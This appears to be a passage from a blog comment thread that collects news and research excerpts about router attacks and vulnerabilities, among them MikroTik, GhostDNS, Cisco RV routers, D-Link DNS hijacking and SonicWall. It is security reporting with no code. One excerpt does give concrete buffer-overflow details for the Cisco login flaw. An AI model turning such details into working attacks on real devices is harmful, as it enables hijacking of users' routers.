What’s more, we have observed massive number of victims having their Socks4 proxy enabled on the device by one single malicious actor.
More interestingly, we also discovered that more than 7,500+ victims are being actively eavesdropped, with their traffic being forwarded to IPs controlled by unknown attackers.
Vulnerable Devices
From our own scan result, we logged more than 5,000K devices with open TCP/8291 port, and 1,200k of them were identified as Mikrotik devices, within which 370k (30.83%) are CVE-2018-14847 vulnerable.
The Attacks
CoinHive Mining Code Injection
Sock4 Proxy and the Mysterious 95.154.216.128/25
Eavesdropping
Suggestions
We recommend that MikroTik RouterOS users update the software system in a timely manner, and check whether the http proxy, Socks4 proxy and network traffic capture function are being maliciously exploited by attackers.
Tomi Engdahl says:
70+ different types of home routers(all together 100,000+) are being hijacked by GhostDNS
http://blog.netlab.360.com/70-different-types-of-home-routers-all-together-100000-are-being-hijacked-by-ghostdns-en/
note:We have informed various ISPs on the IoC list, and OVH, ORACLE, Google, Microsoft have taken down the related IPs and some others are working on it (Thanks!)
Background introduction
DNSchanger is not something new and was quite active years ago [1], we occasionally encountered one every once in a while, but given the impact they have, we normally don’t bother to write any article.
But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.
Furthermore, the above DNSChanger Systems are only part of a larger system that the malware campaign runs. The whole campaign also includes: Phishing Web System, Web Admin System, Rogue DNS System. These four parts work together to perform DNS hijacking function. Here we call the whole campaign GhostDNS.
Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in brazil , even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials.
Tomi Engdahl says:
A mysterious grey-hat is patching people’s outdated MikroTik routers
https://www.zdnet.com/article/a-mysterious-grey-hat-is-patching-peoples-outdated-mikrotik-routers/
Internet vigilante claims he patched over 100,000 MikroTik routers already.
A Russian-speaking grey-hat hacker is breaking into people’s MikroTik routers and patching devices so they can’t be abused by cryptojackers, botnet herders, or other cyber-criminals, ZDNet has learned.
The hacker, who goes by the name of Alexey and says he works as a server administrator, claims to have disinfected over 100,000 MikroTik routers already.
Alexey has not been trying to hide his actions
Tomi Engdahl says:
BCMPUPnP_Hunter: A 100k Botnet Turns Home Routers to Email Spammers
https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/
Since September 2018, 360Netlab Scanmon has detected multiple scan spikes on TCP port 5431, each time the system logged more than 100k scan sources, a pretty large number compared with most other botnets we have covered before.
The interaction between the botnet and the potential target takes multiple steps
The botnet has the following characteristics:
The amount of infection is very large, the number of active scanning IP in each scan event is about 100,000;
The target of infection is mainly router equipment with BroadCom UPnP feature enabled.
Self-built proxy network (tcp-proxy), the proxy network is implemented by the attacker, the proxy currently communicates with well-known mail servers such as Outlook, Hotmail, Yahoo! Mail, etc. We highly suspect that the attacker’s intention is to send spams.
Tomi Engdahl says:
New Spam Botnet Likely Infected 400,000 Devices
https://www.securityweek.com/new-spam-botnet-likely-infected-400000-devices
A newly discovered botnet that appears designed to send spam emails likely infected around 400,000 machines to date, 360 Netlab security researchers warn.
Dubbed BCMPUPnP_Hunter, the threat was observed mainly targeting routers that have the BroadCom UPnP feature enabled.
Tomi Engdahl says:
New Exploit Kit “Novidade” Found Targeting Home and SOHO Routers
https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-novidade-found-targeting-home-and-soho-routers/
We identified a new exploit kit we named Novidade that targets home or small office routers by changing their Domain Name System (DNS) settings via cross-site request forgery (CSRF), enabling attacks on a victim’s mobile device or desktop through web applications in which they’re authenticated with. Once the DNS setting is changed to that of a malicious server, the attacker can execute a pharming attack, redirecting the targeted website traffic from all devices connected to the same router by resolving targeted domains to the IP address of their server.
The earliest Novidade sample we found was from August 2017, and two different variants were identified since. While one of the variants was involved in the DNSChanger system of a recent GhostDNS campaign, we believe that Novidade is not limited to a single campaign, as the exploit kit was also concurrently being used in different campaigns.
70+ different types of home routers(all together 100,000+) are being hijacked by GhostDNS
https://blog.netlab.360.com/70-different-types-of-home-routers-all-together-100000-are-being-hijacked-by-ghostdns-en/
Tomi Engdahl says:
Flaw Possibly Affecting 500,000 Ubiquity Devices Exploited in the Wild
https://www.securityweek.com/flaw-possibly-affecting-500000-ubiquity-devices-exploited-wild
Nearly half a million Ubiquity devices may be affected by a vulnerability that has already been exploited in the wild, security experts warned last week.
Jim Troutman, consultant and director of the Northern New England Neutral Internet Exchange (NNENIX), revealed last week on Twitter that hackers had been remotely targeting Ubiquity networking devices exposed via a discovery service accessible on UDP port 10001.
https://twitter.com/troutman/status/1090212243197870081
Tomi Engdahl says:
Did you hear the one about Cisco routers using strcpy insecurely for login authentication? Makes you go AAAAA-AAAAAAArrg *segfault*
RV110W, RV130W, RV215W need patching to close remote hijacking bug
https://www.theregister.co.uk/2019/03/01/cisco_cve_2019_1663_strcpy_login_authentication/
Cisco has patched three of its RV-series routers after Pen Test Partners (PTP) found them using hoary old C function strcpy insecurely in login authentication function. The programming blunder can be exploited to potentially hijack the devices.
PTP looked at how the routers’ web-based control panel handled login attempts by users, and found that it was alarmingly easy to trigger a buffer overflow by simply supplying a long string of characters as the password, something which Cisco admitted “could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device”.
Lobbing in a password of 447 characters, such as ‘A’, followed by four characters, would allow the hijacker to control a subroutine return address on the web app’s stack using the values of those final characters. That means the hacker could force the device’s 32-bit Arm-based processor to jump to malicious code stashed in the login request.
Tomi Engdahl says:
Cisco Patches Critical Vulnerability in Wireless Routers
https://www.securityweek.com/cisco-patches-critical-vulnerability-wireless-routers
Cisco released security patches this week to address a Critical vulnerability in several wireless routers that allows an attacker to remotely execute code on the impacted devices.
Tracked as CVE-2019-1663 and featuring a CVSS score of 9.8, the security flaw resides in the web-based management interface of three router models and is created due to improper validation of user-supplied data in the web-based management interface.
“An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user,” Cisco explains in an advisory.
Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Tomi Engdahl says:
MikroTik Firewall & NAT Bypass
Exploitation from WAN to LAN
https://medium.com/tenable-techblog/mikrotik-firewall-nat-bypass-b8d46398bf24
In Making It Rain with MikroTik, I mentioned an undisclosed vulnerability in RouterOS. The vulnerability, which I assigned CVE-2019–3924, allows a remote, unauthenticated attacker to proxy crafted TCP and UDP requests through the router’s Winbox port. Proxied requests can even bypass the router’s firewall to reach LAN hosts.
Tomi Engdahl says:
Hackers have started attacks on Cisco RV110, RV130, and RV215 routers
Attacks started two days after Cisco released patch, one day after researchers published demo exploit code.
https://www.zdnet.com/article/hackers-have-started-attacks-on-cisco-rv110-rv130-and-rv215-routers/
Tomi Engdahl says:
Hacker group has been hijacking DNS traffic on D-Link routers for three months
https://www.zdnet.com/article/hacker-group-has-been-hijacking-dns-traffic-on-d-link-routers-for-three-months/
Other router models have also been targeted, such as ARG, DSLink, Secutech, and TOTOLINK.
For the past three months, a cybercrime group has been hacking into home routers –mostly D-Link models– to change DNS server settings and hijack traffic meant for legitimate sites and redirect it to malicious clones.
The attackers operate by using well-known exploits in router firmware to hack into vulnerable devices and make silent changes to the router’s DNS configuration, changes that most users won’t ever notice.
The point of this router hacking campaign was to inject the IP addresses of rogue DNS servers inside people’s routers.
Tomi Engdahl says:
Ongoing DNS Hijacking Campaign Targets Gmail, PayPal, Netflix Users
https://www.securityweek.com/ongoing-dns-hijacking-campaign-targets-gmail-paypal-netflix-users
A DNS hijacking campaign that has been ongoing for the past three months is targeting the users of popular online services, including Gmail, PayPal, and Netflix.
As part of the campaign, the attackers compromised consumer routers to modify their DNS settings and redirect users to rogue websites to steal their login credentials.
Bad Packets security researchers, who have been following the attacks since December, have identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.
“All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169),” the researchers reveal.
The first DNS hijacking exploit targeted D-Link DSL modems such as D-Link DSL-2640B, DSL-2740R, DSL-2780B, and DSL-526B. The rogue DNS server used in this attack was hosted by OVH Canada (IP address 66.70.173.48).
Ongoing DNS hijacking campaign targeting consumer routers
https://badpackets.net/ongoing-dns-hijacking-campaign-targeting-consumer-routers/
Tomi Engdahl says:
https://www.zdnet.com/article/this-aggressive-iot-malware-is-forcing-wi-fi-routers-to-join-its-botnet-army/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem%3A+Trending+Content&utm_content=5dbaf0108021ed000132d25e&utm_medium=trueAnthem&utm_source=facebook
Tomi Engdahl says:
A Zero-day Vulnerability in TP-link Router Let Hackers Gain Admin Privilege & Take Full Control of It Remotely
https://gbhackers.com/tp-link-router/
Researchers discovered a new firmware vulnerability in TP-link Archer C5 (v4) routers Let the attacker gain an Admin Password, and allow them remote takeover the router.
Once the vulnerability has successfully exploited, a remote attacker takes over the router configurated through Telnet on the local area network (LAN) and connects to a File Transfer Protocol (FTP) server via both LAN and WAN.
The vulnerability marked as “Critical” severity since it grants access to unauthorized third-party access due to the improper authentication, and it affects the TP-link Archer C5 router that deployed in both home and business environments.
will allow an attacker to enable the Guest WiFi, through which an attacker enters into the internal network.
An attacker could trigger the vulnerability by just sending the vulnerable HTTP request to be granted access to the device.
Tomi Engdahl says:
https://cablehaunt.com/
Cable Haunt is a critical vulnerability found in cable modems from
various manufacturers across the world. The vulnerability enables
remote attackers to gain complete control of a cable modem, through an
endpoint on the modem. Your cable modem is in charge of the internet
traffic for all devices on the network. Cable Haunt might therefore be
exploited to intercept private messages, redirect . traffic, or
participation in botnets.. [...]
Tomi Engdahl says:
Linksys asks users to reset passwords after hackers hijacked home
routers last month
https://www.zdnet.com/article/linksys-asks-users-to-reset-passwords-after-hackers-hijacked-home-routers-last-month/
Linksys locks Smart WiFi cloud accounts and asks users to reset
passwords after hackers hijacked routers to redirect traffic to
malware sites.
Tomi Engdahl says:
“Asnarök” Trojan targets firewalls
https://news.sophos.com/en-us/2020/04/26/asnarok/
Customized malware used to compromise physical and virtual firewalls.
As we described last week in this KBA, Sophos and its customers were
the victims of a coordinated attack by an unknown adversary. This
attack revealed a previously unknown SQL injection vulnerability that
led to remote code execution on some of our firewall products. As
described in the KBA, the vulnerability has since been remediated.
There was significant orchestration involved in the execution of the
attack, using a chain of Linux shell scripts that eventually
downloaded ELF binary executable malware compiled for a firewall
operating system. This attack targeted Sophos products and apparently
was intended to steal sensitive information from the firewall.
Tomi Engdahl says:
Cloud firewall management API SNAFU put 500k SonicWall customers at
risk
https://www.pentestpartners.com/security-blog/cloud-firewall-management-api-snafu-put-500k-sonicwall-customers-at-risk/
I found a security issue so serious that we then spent £££ on our own
SonicWall products in order to independently validate the issue, to be
certain it wasn’t just our client that was affected. What I discovered
was a trivial method to compromise every single cloud managed device
attached to mysonicwall.com, affecting around 1.9 million user groups
across hundreds of thousands of organisations. At least 10 million
individual devices were affected. Disclosure was initially very
positive, then went rapidly downhill as SonicWall procrastinated with
a fix and refused to take down the vulnerable functionality in the
meantime, knowingly leaving their customers exposed for a full 17
days.